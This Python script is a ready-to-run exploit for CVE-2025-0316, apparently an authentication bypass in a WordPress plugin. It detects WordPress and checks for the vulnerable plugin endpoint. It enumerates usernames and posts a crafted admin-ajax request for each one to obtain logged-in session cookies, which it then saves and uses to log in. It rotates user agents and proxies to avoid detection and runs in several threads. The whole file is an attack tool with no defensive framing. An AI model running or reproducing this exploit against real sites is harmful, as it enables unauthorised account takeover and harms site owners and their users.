
import requests, threading, json, time, argparse, os, random
from urllib.parse import urljoin
from modules.session_handler import save_cookie, auto_login
from modules.recon import enumerate_users, check_plugin
from utils.helpers import load_user_agents, load_proxies, banner

class CVE20250316Exploit:
    def __init__(self, target, threads=3, delay=1.5):
        self.target = target if target.endswith('/') else target + '/'
        self.threads = threads
        self.delay = delay
        self.user_agents = load_user_agents()
        self.proxies = load_proxies()
        self.valid_users = []

    def verify_target(self):
        print("[*] Verifying WordPress target...")
        try:
            r = requests.get(self.target, timeout=5)
            if "wp-content" in r.text or "wp-login" in r.text:
                print("[+] WordPress detected.")
                return True
        except Exception as e:
            print(f"[!] Connection error: {e}")
        return False

    def exploit_user(self, username):
        print(f"[*] Trying user: {username}")
        session = requests.Session()
        session.headers['User-Agent'] = random.choice(self.user_agents)
        proxy = {"http": random.choice(self.proxies)} if self.proxies else None

        post_data = {
            'action': 'wp_dp_enquiry_agent_contact_form_submit_callback',
            'user_login': username
        }

        try:
            r = session.post(urljoin(self.target, "wp-admin/admin-ajax.php"), data=post_data, proxies=proxy)
            if "wordpress_logged_in" in ''.join(session.cookies.keys()).lower():
                print(f"[✓] Exploit success: {username}")
                save_cookie(username, session.cookies.get_dict())
                auto_login(self.target, session.cookies.get_dict())
        except Exception as e:
            print(f"[!] Exploit error for {username}: {e}")

    def run_threads(self):
        print("[*] Launching exploit threads...")
        chunk = max(1, len(self.valid_users) // self.threads)
        threads = []
        for i in range(self.threads):
            subset = self.valid_users[i * chunk:(i + 1) * chunk]
            t = threading.Thread(target=self.worker, args=(subset,))
            t.start()
            threads.append(t)
        for t in threads:
            t.join()

    def worker(self, users):
        for user in users:
            self.exploit_user(user)
            time.sleep(self.delay)

    def start(self):
        banner()
        if not self.verify_target():
            print("[✘] Target not WordPress. Exiting.")
            return
        if not check_plugin(self.target):
            print("[✘] Vulnerable plugin endpoint not found.")
            return

        self.valid_users = enumerate_users(self.target)
        if not self.valid_users:
            print("[!] No valid usernames discovered.")
            return

        self.run_threads()

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="CVE-2025-0316 WordPress Exploit")
    parser.add_argument("-u", "--url", help="Target site URL", required=True)
    parser.add_argument("-t", "--threads", type=int, default=3)
    parser.add_argument("-d", "--delay", type=float, default=1.5)
    args = parser.parse_args()

    exploit = CVE20250316Exploit(args.url, args.threads, args.delay)
    exploit.start()
